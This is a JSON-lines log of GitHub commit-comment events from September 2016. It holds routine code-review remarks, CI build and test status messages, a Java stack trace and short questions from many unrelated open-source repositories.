{"id":"4608504841","type":"CommitCommentEvent","actor":{"login":"jirotubuyaki"},"repo":{"name":"jirotubuyaki/CreateJS_clock"},"payload":{"comment":{"id":19146047,"position":null,"line":null,"path":null,"commit_id":"4e206ba7715d237be0a1183534a23e31f7d10c62","created_at":"2016-09-23T13:21:14Z","updated_at":"2016-09-23T13:21:14Z","body":"JavaScript codes created by CreateJS"}},"created_at":"2016-09-23T13:21:14Z"}
{"id":"4608505774","type":"CommitCommentEvent","actor":{"login":"FernetMenta"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":19146049,"position":null,"line":null,"path":null,"commit_id":"d2650c688b22f2912225fb107405b11e1731826e","created_at":"2016-09-23T13:21:24Z","updated_at":"2016-09-23T13:21:24Z","body":"@Jalle19 could you have a look at those crashlogs? I think it is related\r\nhttp://forum.kodi.tv/showthread.php?tid=269814&pid=2421462#pid2421462"}},"created_at":"2016-09-23T13:21:24Z"}
{"id":"4608505802","type":"CommitCommentEvent","actor":{"login":"fheck"},"repo":{"name":"vulder/INAW"},"payload":{"comment":{"id":19146050,"position":19,"line":19,"path":"code/modules/Lemmatizer.py","commit_id":"cbb1b09ae30c726c60a7fc9de36f465a59a90bdb","created_at":"2016-09-23T13:21:25Z","updated_at":"2016-09-23T13:21:25Z","body":"I just saw your changes, this was my intention all along! The code was probably just a copy/pase error. \r\nSorry for the misunderstanding of your comment, I didn't see the difference until you changed it and just thought it was a general question about the logic."}},"created_at":"2016-09-23T13:21:25Z"}
{"id":"4608508689","type":"CommitCommentEvent","actor":{"login":"anggayoga"},"repo":{"name":"M66B/XPrivacy"},"payload":{"comment":{"id":19146055,"position":6,"line":370,"path":"README.md","commit_id":"4816bdfa97dedc41b26dca60ac6225ea3b9be99e","created_at":"2016-09-23T13:21:58Z","updated_at":"2016-09-23T13:21:58Z","body":"this very help me"}},"created_at":"2016-09-23T13:21:58Z"}
{"id":"4608509633","type":"CommitCommentEvent","actor":{"login":"lmouline"},"repo":{"name":"kevoree-modeling/mwDB"},"payload":{"comment":{"id":19146060,"position":null,"line":null,"path":null,"commit_id":"cd03aba0150f61d8034c48eb455c7bd95fe2cfda","created_at":"2016-09-23T13:22:10Z","updated_at":"2016-09-23T13:22:10Z","body":"@kevoree-modeling/crew \r\nCurrently, it is not usable in JS, because I use Java reflexivity to call the method with parameters. Thus, If we keep this in a similar way, we have to find a way to transpile the feature in JS"}},"created_at":"2016-09-23T13:22:10Z"}
{"id":"4608510542","type":"CommitCommentEvent","actor":{"login":"Ricardo-M-Lu"},"repo":{"name":"Ricardo-M-Lu/anti-phishing"},"payload":{"comment":{"id":19146061,"position":null,"line":null,"path":null,"commit_id":"625a19f93412295ed0fe9601167759193a7fb93d","created_at":"2016-09-23T13:22:20Z","updated_at":"2016-09-23T13:22:20Z","body":"internet"}},"created_at":"2016-09-23T13:22:20Z"}
{"id":"4608511975","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19146068,"position":null,"line":null,"path":null,"commit_id":"0a2444e751ca1425090d341c62e9a55c639b086f","created_at":"2016-09-23T13:22:37Z","updated_at":"2016-09-23T13:22:37Z","body":"++"}},"created_at":"2016-09-23T13:22:37Z"}
{"id":"4608512774","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19146073,"position":null,"line":null,"path":null,"commit_id":"ac0d4e7748e0135ff367bc55e1132cbee7f2cc14","created_at":"2016-09-23T13:22:46Z","updated_at":"2016-09-23T13:22:46Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1198 of 1198 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ac0d4e7748e0135ff367bc55e1132cbee7f2cc14-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ac0d4e7748e0135ff367bc55e1132cbee7f2cc14-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ac0d4e7748e0135ff367bc55e1132cbee7f2cc14-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.15%25-green.svg)</a>\n"}},"created_at":"2016-09-23T13:22:46Z"}
{"id":"4608514929","type":"CommitCommentEvent","actor":{"login":"MNFelten"},"repo":{"name":"ESP8266nu/ESPEasyPluginPlayground"},"payload":{"comment":{"id":19146075,"position":null,"line":null,"path":null,"commit_id":"b7e9ec7136d8221a47bfa51a87d4d52e31c88d06","created_at":"2016-09-23T13:22:58Z","updated_at":"2016-09-23T13:22:58Z","body":"Hallo,\r\nHoe werkt deze plugin precies?\r\nIk zou hem graag willen gebruiken ipv een RFlink. is dat mogelijk?\r\nHoe stel ik hem in i.c.m. Domoticz?\r\nGroeten,\r\nMNFelten"}},"created_at":"2016-09-23T13:22:58Z"}
{"id":"4608516698","type":"CommitCommentEvent","actor":{"login":"wm4"},"repo":{"name":"mpv-player/mpv"},"payload":{"comment":{"id":19146079,"position":null,"line":null,"path":null,"commit_id":"efbfc00741d36e9de8b724e615c5b723bcf28f20","created_at":"2016-09-23T13:23:18Z","updated_at":"2016-09-23T13:23:18Z","body":"Thanks, fixed."}},"created_at":"2016-09-23T13:23:18Z"}
{"id":"4608520255","type":"CommitCommentEvent","actor":{"login":"jjallaire"},"repo":{"name":"rstudio/spark.rstudio.com"},"payload":{"comment":{"id":19146091,"position":null,"line":null,"path":null,"commit_id":"19f327428398b6f3f3f6e2563108da94177c8f0e","created_at":"2016-09-23T13:24:00Z","updated_at":"2016-09-23T13:24:00Z","body":"@nwstephens "}},"created_at":"2016-09-23T13:24:00Z"}
{"id":"4608521789","type":"CommitCommentEvent","actor":{"login":"cheidegg"},"repo":{"name":"ECOP/cmgtools-lite"},"payload":{"comment":{"id":19146096,"position":24,"line":274,"path":"TTHAnalysis/python/plotter/susy-interface/lib/maker.py","commit_id":"0f119ee463b0d589c1143f75eb8d17d6d6bcad10","created_at":"2016-09-23T13:24:17Z","updated_at":"2016-09-23T13:24:17Z","body":"It's great that you add the oviedo batch handling. Thanks for that.\r\nDid you test that jobLine.split('.')[0] returns the proper job ID for the batch system?\r\nBtw what kind of batch system is it, I mean, does it support the -hold_jid option (see line 268) ? For example, LSF (i.e. lxbatch) does not support it unfortunately, hence, the if condition in line 267. "}},"created_at":"2016-09-23T13:24:17Z"}
{"id":"4608522144","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":19146098,"position":null,"line":null,"path":null,"commit_id":"5b780579b6bacb6d1faa407eb32819eece53446b","created_at":"2016-09-23T13:24:21Z","updated_at":"2016-09-23T13:24:21Z","body":"Quite frankly, I am waiting for input other than WM profiles, specifically official ones..\r\nThe yaml files were prototypes, and I expected we would discuss what groups we gonna have, I started with some shred groups."}},"created_at":"2016-09-23T13:24:21Z"}
{"id":"4608522389","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19146099,"position":null,"line":null,"path":null,"commit_id":"4ca0020667f27130c273add360f12f822fe8f0d6","created_at":"2016-09-23T13:24:24Z","updated_at":"2016-09-23T13:24:24Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1145](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14119&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T13:24:24Z"}
{"id":"4608526084","type":"CommitCommentEvent","actor":{"login":"ropalka"},"repo":{"name":"wildfly/wildfly-core"},"payload":{"comment":{"id":19146110,"position":26,"line":1512,"path":"pom.xml","commit_id":"44aca3e92c3c73996d6155fb8d8028d3510c5f08","created_at":"2016-09-23T13:25:08Z","updated_at":"2016-09-23T13:25:08Z","body":"Private exports are required (as you would probably guess) mainly by jboss-marshalling.\r\nFor public exports I don't have such list available. But I can create one."}},"created_at":"2016-09-23T13:25:08Z"}
{"id":"4608527395","type":"CommitCommentEvent","actor":{"login":"tdesvenain"},"repo":{"name":"collective/collective.excelexport"},"payload":{"comment":{"id":19146115,"position":12,"line":50,"path":"src/collective/excelexport/view.py","commit_id":"574739cc2fca6b294c2e614b1762e4f457482f88","created_at":"2016-09-23T13:25:23Z","updated_at":"2016-09-23T13:25:23Z","body":"Can you add a unit test for this ?"}},"created_at":"2016-09-23T13:25:23Z"}
{"id":"4608527580","type":"CommitCommentEvent","actor":{"login":"webdevium"},"repo":{"name":"Vladnev/Laravel"},"payload":{"comment":{"id":19146116,"position":26,"line":63,"path":"app/UserFunc.php","commit_id":"d83ace6829ec95a48c2e1150d1d488f3517f53e6","created_at":"2016-09-23T13:25:25Z","updated_at":"2016-09-23T13:25:25Z","body":"Я бы все таки создал модель `Album`.\r\n\r\nЭто легко: в корневой папке проекта выполнить\r\n`php artisan make:model Album`"}},"created_at":"2016-09-23T13:25:25Z"}
{"id":"4608532054","type":"CommitCommentEvent","actor":{"login":"stephanlukasczyk"},"repo":{"name":"vulder/INAW"},"payload":{"comment":{"id":19146126,"position":19,"line":19,"path":"code/modules/Lemmatizer.py","commit_id":"cbb1b09ae30c726c60a7fc9de36f465a59a90bdb","created_at":"2016-09-23T13:26:16Z","updated_at":"2016-09-23T13:26:16Z","body":"No problem. Especially, after reading the article you linked, it was clear to my why this code is doing things this way. The only necessary change was the one, I did by my change. The rest looks fine to me. But thanks for clearification and linking the article."}},"created_at":"2016-09-23T13:26:16Z"}
{"id":"4608533013","type":"CommitCommentEvent","actor":{"login":"Jalle19"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":19146131,"position":null,"line":null,"path":null,"commit_id":"d2650c688b22f2912225fb107405b11e1731826e","created_at":"2016-09-23T13:26:27Z","updated_at":"2016-09-23T13:26:27Z","body":"Crap, I'll take a look."}},"created_at":"2016-09-23T13:26:27Z"}
{"id":"4608544855","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19146166,"position":null,"line":null,"path":null,"commit_id":"6bcd374a352a4332fe9f65515b4026087e670af3","created_at":"2016-09-23T13:28:51Z","updated_at":"2016-09-23T13:28:51Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/33312/testReport/) for this commit**"}},"created_at":"2016-09-23T13:28:51Z"}
{"id":"4608547411","type":"CommitCommentEvent","actor":{"login":"vischia"},"repo":{"name":"ECOP/cmgtools-lite"},"payload":{"comment":{"id":19146180,"position":24,"line":274,"path":"TTHAnalysis/python/plotter/susy-interface/lib/maker.py","commit_id":"0f119ee463b0d589c1143f75eb8d17d6d6bcad10","created_at":"2016-09-23T13:29:19Z","updated_at":"2016-09-23T13:29:19Z","body":"Hi @cheidegg,\n\n2016-09-23 15:24 GMT+02:00 cheidegg <notifications@github.com>:\n\n> It's great that you add the oviedo batch handling. Thanks for that.\n> Did you test that jobLine.split('.')[0] returns the proper job ID for the\n> batch system?\n>\n\nYes, I tested it.\nOur jobLines are in the format ######.machine.somehost.unovi.es\n\nBtw what kind of batch system is it, I mean, does it support the -hold_jid\n> option (see line 268) ? For example, LSF (i.e. lxbatch) does not support it\n> unfortunately, hence, the if condition in line 267.\n>\n\nIt is a Torque + Maui system.\n\nI did not check about the -hold_jid option: will do now :)\n\nCheers,\nPietro\n\n\n\n\n\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ECOP/cmgtools-lite/commit/0f119ee463b0d589c1143f75eb8d17d6d6bcad10#commitcomment-19146096>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEBGqNs32hcc3MoBm5Vk80-kMF1Dca0wks5qs9MBgaJpZM4KE-ZF>\n> .\n>\n\n\n\n-- \nDr. Pietro Vischia\nUniversidad de Oviedo - Departamento de Física, Facultad de Ciencias, Calvo\nSotelo s/n, 33007 Oviedo, España\nmobiles: 0034 666 986 616 (ES), 00351 96 724 9239 (PT)\noffice: 0034 985 103 383\nmail: pietro.vischia@cern.ch pietro.vischia@gmail.com\nskype: rambling_hadron\n"}},"created_at":"2016-09-23T13:29:19Z"}
{"id":"4608547460","type":"CommitCommentEvent","actor":{"login":"vinaymaddela"},"repo":{"name":"vinaymaddela/vinaygit"},"payload":{"comment":{"id":19146181,"position":null,"line":null,"path":null,"commit_id":"ec9b96ae25380bc362c8482f990dc63fdd49bb2f","created_at":"2016-09-23T13:29:20Z","updated_at":"2016-09-23T13:29:20Z","body":"trail"}},"created_at":"2016-09-23T13:29:20Z"}
{"id":"4608549697","type":"CommitCommentEvent","actor":{"login":"luoanni"},"repo":{"name":"Bang-bang-bang/Food-mall-communication-platform"},"payload":{"comment":{"id":19146193,"position":null,"line":null,"path":null,"commit_id":"592ad70e664c18586c9ae66809f03fbce640d65a","created_at":"2016-09-23T13:29:46Z","updated_at":"2016-09-23T13:29:46Z","body":"零食小舍-原型设计"}},"created_at":"2016-09-23T13:29:46Z"}
{"id":"4608549750","type":"CommitCommentEvent","actor":{"login":"dmlloyd"},"repo":{"name":"wildfly/wildfly-core"},"payload":{"comment":{"id":19146194,"position":26,"line":1512,"path":"pom.xml","commit_id":"44aca3e92c3c73996d6155fb8d8028d3510c5f08","created_at":"2016-09-23T13:29:46Z","updated_at":"2016-09-23T13:29:46Z","body":"OK.  It's not a high priority but everything you can think of offhand would probably help.  I still am holding hope that by the time Java 9 is released we should need very few if any of these."}},"created_at":"2016-09-23T13:29:46Z"}
{"id":"4608557667","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19146208,"position":null,"line":null,"path":null,"commit_id":"7272223930c7cb67ea9d92d6c85b6752e7f62594","created_at":"2016-09-23T13:31:12Z","updated_at":"2016-09-23T13:31:12Z","body":"never seen anyone get confused, but OK.\r\n\r\nIts not a hack though, its the most platform independent comment for markdown."}},"created_at":"2016-09-23T13:31:12Z"}
{"id":"4608559010","type":"CommitCommentEvent","actor":{"login":"Faballion"},"repo":{"name":"Faballion/TestRepo"},"payload":{"comment":{"id":19146211,"position":2,"line":2,"path":"newfeature.html","commit_id":"98ad4d054d8a81ab374b6e4eda3484c5a09fe6ea","created_at":"2016-09-23T13:31:26Z","updated_at":"2016-09-23T13:31:26Z","body":"use captials"}},"created_at":"2016-09-23T13:31:26Z"}
{"id":"4608561994","type":"CommitCommentEvent","actor":{"login":"will02"},"repo":{"name":"golang/go"},"payload":{"comment":{"id":19146220,"position":null,"line":null,"path":null,"commit_id":"9ac67f56f776ccf1708d25ce3f4f02ac771551de","created_at":"2016-09-23T13:32:01Z","updated_at":"2016-09-23T13:32:01Z","body":"hello"}},"created_at":"2016-09-23T13:32:01Z"}
{"id":"4608563801","type":"CommitCommentEvent","actor":{"login":"sbidoul"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19146227,"position":17,"line":503,"path":"addons/l10n_be/data/account_pcmn_belgium_data.xml","commit_id":"76fa6abfcc5d10e51dde00c3f997a8cfac3ccd3c","created_at":"2016-09-23T13:32:21Z","updated_at":"2016-09-23T13:32:21Z","body":":clap:"}},"created_at":"2016-09-23T13:32:21Z"}
{"id":"4608565677","type":"CommitCommentEvent","actor":{"login":"tanmaykurmi"},"repo":{"name":"tanmaykurmi/hello-world"},"payload":{"comment":{"id":19146233,"position":1,"line":1,"path":"README.md","commit_id":"3a0807f264896caaaf6efcfabece76d1fb73b27f","created_at":"2016-09-23T13:32:43Z","updated_at":"2016-09-23T13:32:43Z","body":"i'm tanmay"}},"created_at":"2016-09-23T13:32:43Z"}
{"id":"4608565909","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19146234,"position":null,"line":null,"path":null,"commit_id":"c9265079d04ec8b5a8fe05a97e9e74dff8215c17","created_at":"2016-09-23T13:32:46Z","updated_at":"2016-09-23T13:32:46Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1146](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14124&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T13:32:46Z"}
{"id":"4608570377","type":"CommitCommentEvent","actor":{"login":"remicollet"},"repo":{"name":"glpi-project/glpi"},"payload":{"comment":{"id":19146247,"position":5,"line":128,"path":"inc/dbmysql.class.php","commit_id":"ac257737290926c32980d074aad22ed80802b231","created_at":"2016-09-23T13:33:34Z","updated_at":"2016-09-23T13:33:34Z","body":"I miss the PR...\r\nBut seems better to use the OO call, so $this->db->set_charset(...)"}},"created_at":"2016-09-23T13:33:34Z"}
{"id":"4608575067","type":"CommitCommentEvent","actor":{"login":"EvilBeaver"},"repo":{"name":"dmpas/OneScript"},"payload":{"comment":{"id":19146254,"position":null,"line":null,"path":null,"commit_id":"ac4aa56921b31e2c0e9ad19ea02551fcc2c1bf4b","created_at":"2016-09-23T13:34:27Z","updated_at":"2016-09-23T13:34:27Z","body":"pr будет?"}},"created_at":"2016-09-23T13:34:27Z"}
{"id":"4608576258","type":"CommitCommentEvent","actor":{"login":"mkresin"},"repo":{"name":"xdarklight/mktplinkfw3"},"payload":{"comment":{"id":19146257,"position":null,"line":null,"path":null,"commit_id":"be60f7470c133db2953653924e1e1cba1f0c0ced","created_at":"2016-09-23T13:34:42Z","updated_at":"2016-09-23T13:34:42Z","body":"> can you explain where did you get the boot salt from since it differs from the one in mktplinkfw2\r\n\r\nI got the boot salt from the disassembled tp-link firmware update routine. Since OpenWrt never bundled an u-boot update with the firmware images, it's not unlikely that this salt was wrong from the beginning.\r\n\r\n> and this salt should affect fw upgrades only without u-boot or not?\r\n\r\nmd5salt_boot is the salt that is used for the md5 checksum of the u-boot update part of the firmware upgrade image. Please check the source code before asking such self explaining question!\r\n\r\n> Error opening Public Key tp-link_pubkey.bin.ms_publickeyblob\r\n\r\nWell, you need to create this file with the base64 encoded public key as content before using the script. I can not remember if the key needs to be stored as base64 or as binary. But converting between both is a no brainer."}},"created_at":"2016-09-23T13:34:42Z"}
{"id":"4608576692","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19146258,"position":null,"line":null,"path":null,"commit_id":"6d7368d706bb10e6751b55ce371956b74561d677","created_at":"2016-09-23T13:34:46Z","updated_at":"2016-09-23T13:34:46Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35989/testReport/) for this commit**"}},"created_at":"2016-09-23T13:34:46Z"}
{"id":"4608576921","type":"CommitCommentEvent","actor":{"login":"PineApple777"},"repo":{"name":"HYU-ICEWALL/blog"},"payload":{"comment":{"id":19146259,"position":null,"line":null,"path":null,"commit_id":"565df7f922d4631b64638a0d976603f01dade819","created_at":"2016-09-23T13:34:49Z","updated_at":"2016-09-23T13:34:49Z","body":"블로그 주소를 공개하는 것에 대해선 어떻게 생각하시나요 \r\n현재 메인 README.md에서는 블로그 주소로 바로 접근이 불가능한것 같네용"}},"created_at":"2016-09-23T13:34:49Z"}
{"id":"4608580424","type":"CommitCommentEvent","actor":{"login":"rickyschoolsFS"},"repo":{"name":"rickyschoolsFS/FS_Performance"},"payload":{"comment":{"id":19146266,"position":null,"line":null,"path":null,"commit_id":"4409f313b56519552815035e2f519b93e8cf4d78","created_at":"2016-09-23T13:35:27Z","updated_at":"2016-09-23T13:35:27Z","body":"#1 "}},"created_at":"2016-09-23T13:35:27Z"}
{"id":"4608581307","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19146270,"position":null,"line":null,"path":null,"commit_id":"c9265079d04ec8b5a8fe05a97e9e74dff8215c17","created_at":"2016-09-23T13:35:39Z","updated_at":"2016-09-23T13:35:39Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1146](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14124&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Compilation error: Scala compiler (new) Build time: 00:02:53"}},"created_at":"2016-09-23T13:35:39Z"}
{"id":"4608582059","type":"CommitCommentEvent","actor":{"login":"Gachapen"},"repo":{"name":"overwork/moodlemobile2"},"payload":{"comment":{"id":19146272,"position":4,"line":411,"path":"www/addons/messages/services/messages.js","commit_id":"ee8761e9274adc29734dbd15fbfa58c580cac759","created_at":"2016-09-23T13:35:48Z","updated_at":"2016-09-23T13:35:48Z","body":"You added an extra line. You should remove it and ammend the commit."}},"created_at":"2016-09-23T13:35:48Z"}
{"id":"4608583243","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19146274,"position":null,"line":null,"path":null,"commit_id":"4ca0020667f27130c273add360f12f822fe8f0d6","created_at":"2016-09-23T13:36:03Z","updated_at":"2016-09-23T13:36:03Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1145](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14119&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 251, ignored: 3 Build time: 00:11:39"}},"created_at":"2016-09-23T13:36:03Z"}
{"id":"4608584718","type":"CommitCommentEvent","actor":{"login":"omnisnash"},"repo":{"name":"omnisnash/app4-qualite-bowling"},"payload":{"comment":{"id":19146279,"position":null,"line":null,"path":null,"commit_id":"5d63c395183f5d32354512684a37a97f9808cff8","created_at":"2016-09-23T13:36:21Z","updated_at":"2016-09-23T13:36:21Z","body":"The new tuples implementation is in this commit (by mistake)"}},"created_at":"2016-09-23T13:36:21Z"}
{"id":"4608586608","type":"CommitCommentEvent","actor":{"login":"rrelmy"},"repo":{"name":"edalzell/mailchimp"},"payload":{"comment":{"id":19146283,"position":null,"line":null,"path":null,"commit_id":"0e63c71f99342effaa6050d823bce55f4e9e6896","created_at":"2016-09-23T13:36:44Z","updated_at":"2016-09-23T13:36:44Z","body":"The key inside the settings file needs to be updated too ;-)"}},"created_at":"2016-09-23T13:36:44Z"}
{"id":"4608588462","type":"CommitCommentEvent","actor":{"login":"zoffixznet"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":19146287,"position":9,"line":573,"path":"doc/Language/typesystem.pod6","commit_id":"53f32fda3d0bdd24b03837e367e59b5574fd5bda","created_at":"2016-09-23T13:37:06Z","updated_at":"2016-09-23T13:37:06Z","body":"`where` blocks already smartmatch, so `* ~~ E1|E2` seems to make that fact less obvious. It can be written as just\r\n\r\n```\r\n g(@a where .all ~~ subset :: where E1|E2 )\r\n```"}},"created_at":"2016-09-23T13:37:06Z"}
{"id":"4608590344","type":"CommitCommentEvent","actor":{"login":"Gachapen"},"repo":{"name":"overwork/moodlemobile2"},"payload":{"comment":{"id":19146292,"position":12,"line":419,"path":"www/addons/messages/services/messages.js","commit_id":"ee8761e9274adc29734dbd15fbfa58c580cac759","created_at":"2016-09-23T13:37:27Z","updated_at":"2016-09-23T13:37:27Z","body":"You should probably remove this line as well."}},"created_at":"2016-09-23T13:37:27Z"}
{"id":"4608590464","type":"CommitCommentEvent","actor":{"login":"dmpas"},"repo":{"name":"dmpas/OneScript"},"payload":{"comment":{"id":19146293,"position":null,"line":null,"path":null,"commit_id":"ac4aa56921b31e2c0e9ad19ea02551fcc2c1bf4b","created_at":"2016-09-23T13:37:29Z","updated_at":"2016-09-23T13:37:29Z","body":"Разумеется, будет. В рамках #103, когда допилю."}},"created_at":"2016-09-23T13:37:29Z"}
{"id":"4608591726","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19146297,"position":null,"line":null,"path":null,"commit_id":"7c4e7cb6c1f4fe075d37b318bcf582d17811da84","created_at":"2016-09-23T13:37:44Z","updated_at":"2016-09-23T13:37:44Z","body":"develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (2165 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.44%25-red.svg)</a> \n"}},"created_at":"2016-09-23T13:37:44Z"}
{"id":"4608591982","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"nitrogen-project/android_vendor_nitrogen"},"payload":{"comment":{"id":19146298,"position":16,"line":64,"path":"products/common.mk","commit_id":"328937199101e42bd543403ec9e6391772bbb2ee","created_at":"2016-09-23T13:37:46Z","updated_at":"2016-09-23T13:37:46Z","body":"Nice mess up.\r\n"}},"created_at":"2016-09-23T13:37:46Z"}
{"id":"4608592417","type":"CommitCommentEvent","actor":{"login":"ropalka"},"repo":{"name":"wildfly/wildfly-core"},"payload":{"comment":{"id":19146299,"position":13,"line":1236,"path":"host-controller/src/main/java/org/jboss/as/host/controller/DomainModelControllerService.java","commit_id":"fbc1ac51d1dd57cc00abdbc09306623347b9e7dc","created_at":"2016-09-23T13:37:52Z","updated_at":"2016-09-23T13:37:52Z","body":"2016-09-23 15:33:32,635 ERROR [org.jboss.msc.service.fail] (MSC service thread 1-6) MSC000001: Failed to start service jboss.as: org.jboss.msc.service.StartException in service jbo\r\n<------>at org.jboss.msc.service.ServiceControllerImpl$StartTask.run(ServiceControllerImpl.java:1904)\r\n<------>at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1161)\r\n<------>at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)\r\n<------>at java.base/java.lang.Thread.run(Thread.java:843)\r\nCaused by: java.lang.NoClassDefFoundError: org/jboss/security/vault/SecurityVaultException\r\n<------>at java.base/java.lang.Class.getDeclaredConstructors0(Native Method)\r\n<------>at java.base/java.lang.Class.privateGetDeclaredConstructors(Class.java:2943)\r\n<------>at java.base/java.lang.Class.getConstructor0(Class.java:3345)\r\n<------>at java.base/java.lang.Class.getConstructor(Class.java:2011)\r\n<------>at java.base/java.util.ServiceLoader$ProviderImpl$2.run(ServiceLoader.java:641)\r\n<------>at java.base/java.util.ServiceLoader$ProviderImpl$2.run(ServiceLoader.java:636)\r\n<------>at java.base/java.security.AccessController.doPrivileged(Native Method)\r\n<------>at java.base/java.util.ServiceLoader$ProviderImpl.getConstructor(ServiceLoader.java:648)\r\n<------>at java.base/java.util.ServiceLoader$ProviderImpl.get(ServiceLoader.java:576)\r\n<------>at java.base/java.util.ServiceLoader$2.next(ServiceLoader.java:1176)\r\n<------>at org.jboss.as.server.ApplicationServerService.loadVaultReaderService(ApplicationServerService.java:232)\r\n<------>at org.jboss.as.server.ApplicationServerService.start(ApplicationServerService.java:156)\r\n<------>at org.jboss.msc.service.ServiceControllerImpl$StartTask.startService(ServiceControllerImpl.java:1948)\r\n<------>at org.jboss.msc.service.ServiceControllerImpl$StartTask.run(ServiceControllerImpl.java:1881)\r\n<------>... 3 more\r\nCaused by: java.lang.ClassNotFoundException: org.jboss.security.vault.SecurityVaultException from [Module \"org.jboss.as.server:main\" from local module loader @418e7838 (finder: loc\r\n<------>at org.jboss.modules.ModuleClassLoader.findClass(ModuleClassLoader.java:199)\r\n<------>at org.jboss.modules.ConcurrentClassLoader.performLoadClassUnchecked(ConcurrentClassLoader.java:377)\r\n<------>at org.jboss.modules.ConcurrentClassLoader.performLoadClass(ConcurrentClassLoader.java:365)\r\n<------>at org.jboss.modules.ConcurrentClassLoader.loadClass(ConcurrentClassLoader.java:94)\r\n"}},"created_at":"2016-09-23T13:37:52Z"}
{"id":"4608593731","type":"CommitCommentEvent","actor":{"login":"blackearth2014"},"repo":{"name":"devernay/openfx-misc"},"payload":{"comment":{"id":19146300,"position":null,"line":null,"path":null,"commit_id":"211bb957b88697b32b95b23f72f1a1db53fafdb0","created_at":"2016-09-23T13:38:08Z","updated_at":"2016-09-23T13:38:08Z","body":"Is this PIK node another keying node or more robust option for the ChromaKeyer node?"}},"created_at":"2016-09-23T13:38:08Z"}
{"id":"4608595921","type":"CommitCommentEvent","actor":{"login":"JohnKNess"},"repo":{"name":"AaronMBertrand/SQL-Server-First-Responder-Kit"},"payload":{"comment":{"id":19146305,"position":null,"line":null,"path":null,"commit_id":"b53aa29fd72ba539f37ff2dc64b69959897b1bc9","created_at":"2016-09-23T13:38:32Z","updated_at":"2016-09-23T13:38:32Z","body":"Great replacement for the built-in sp_MSforeachdb.\r\n\r\nAfter 20 years of being a DBA this snippet of code is the reason I finally understood the need for a where statement to begin with `WHERE 1=1`. I usually created complicated CASE statements to extend the SQL statements in my sprocs."}},"created_at":"2016-09-23T13:38:32Z"}
